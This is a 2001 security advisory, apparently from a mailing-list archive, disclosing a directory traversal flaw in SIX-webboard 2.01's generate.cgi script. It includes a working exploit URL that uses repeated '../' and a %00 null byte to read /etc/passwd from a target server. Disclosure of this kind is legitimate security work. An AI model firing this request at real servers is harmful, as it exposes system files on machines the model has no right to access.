* a little bit late, but "it's better late than never"! * --------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]- --------------- -NAME: SIX-webboard 2.01 "show files" vulnerability. -DESCRIPTION: Little, but very popular webboard coded by Pipo (webmasterat_private). Find more information about the SIX-webboard here: http://www.sixhead.com or http://www.sixhead.net. -PROBLEM: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally. -EXPLOIT: http://www.target.net/cgi-bin/webboard/generate.cgi ?content=../../../../../../../../../etc/passwd% 00&board=boardsname !The above line if given will output the file contents of /etc/passwd -AUTHORs: Discovery: digitalseed and k$en0r Advisory: digitalseed -DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk. -COPYRIGHT: PoizonB0x Crew - www.poizonb0x.org (c) 2000- 2001 --------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]- ---------------
This archive was generated by hypermail 2b30 : Mon Aug 13 2001 - 11:29:18 PDT